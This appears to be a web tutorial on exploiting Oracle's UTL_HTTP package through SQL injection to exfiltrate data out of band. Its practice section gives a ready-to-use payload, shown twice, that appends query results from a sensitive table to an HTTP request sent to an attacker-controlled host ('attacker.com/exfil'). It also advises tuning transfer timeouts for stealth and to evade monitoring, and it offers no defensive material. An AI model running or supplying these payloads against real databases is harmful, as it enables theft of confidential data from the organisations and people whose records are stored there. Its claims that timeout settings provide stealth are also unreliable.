UTL_HTTP

Context

This article will guide you through exploiting the Oracle database's UTL_HTTP package for out-of-band data exfiltration via SQL injection. The objective is to understand how to leverage this package to send sensitive information from a compromised database to an attacker-controlled server using HTTP requests. For this technique, it is assumed that you already possess knowledge of the HTTP protocol, Oracle database architecture, and Oracle SQL injection techniques.

Theory

UTL_HTTP Package in Oracle

The UTL_HTTP package in Oracle is a PL/SQL package designed to facilitate HTTP requests from within the Oracle database. This package allows the database to interact with web services over HTTP, enabling diverse applications such as retrieving content from web resources or interacting with RESTful APIs. However, this functionality also introduces a potential vulnerability. If a SQL injection point exists, an attacker can use UTL_HTTP to exfiltrate data by sending it over HTTP to an external server that they control.

HTTP Exfiltration via UTL_HTTP

The primary attack vector using UTL_HTTP involves crafting a SQL injection payload that makes an HTTP request to an attacker-controlled URL, appending sensitive data as query parameters. This mechanism allows a steady flow of data from the database directly to the attacker's server. This method is insidiously effective as it uses a legitimate database feature to facilitate the misdirection of sensitive data.

UTL_HTTP.REQUEST Function

The UTL_HTTP.REQUEST function is responsible for sending an HTTP request to a specified URL and returning the response. In the context of exploitation, this function can be manipulated to append sensitive data from the database into the HTTP request sent to an external server. This exploitation takes advantage of the function's intended behavior for malicious purposes.

UTL_HTTP.set_transfer_timeout

The UTL_HTTP.set_transfer_timeout function is used to define the timeout duration for HTTP requests made by the UTL_HTTP package. By adjusting this setting, an attacker can optimize the operation to avoid detection or to ensure that the exfiltration process completes swiftly. An improperly set timeout can also lead to denial of service or provide cover against security monitoring.

Practice

Exfiltrate data using UTL_HTTP.REQUEST

  • Initiate the SQL injection payload to send sensitive data to an attacker's control by executing:

    SELECT UTL_HTTP.REQUEST('http://attacker.com/exfil?data='||(SELECT sensitive_data FROM sensitive_table)) FROM dual;

    This command crafts a SQL injection that appends the results of querying sensitive data to an HTTP request directed to the attacker’s server.

  • To ensure the operation functions unobstructedly, set a short timeout:

    EXEC UTL_HTTP.set_transfer_timeout(5);

    This step reduces the likelihood of detection by limiting the time the database spends on HTTP operations.

The outcome of these steps should be the successful exfiltration of sensitive data from the database to your specified server, facilitated by HTTP.

Configure UTL_HTTP for stealthy exfiltration

  • Adjust the timeout settings for better performance and stealth:

    EXEC UTL_HTTP.set_transfer_timeout(10);

    By tweaking the timeout, you can maintain a balance between the stealthiness of your operation and its reliability.

  • Execute the refined exfiltration command:

    SELECT UTL_HTTP.REQUEST('http://attacker.com/exfil?data='||(SELECT sensitive_data FROM sensitive_table)) FROM dual;

    This ensures significant pieces of data are steadily sent out without immediate detection by monitoring systems.

Through these steps, you can achieve a more discreet and efficient data exfiltration process.

Tools

  • Oracle SQL*Plus
  • Wireshark

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.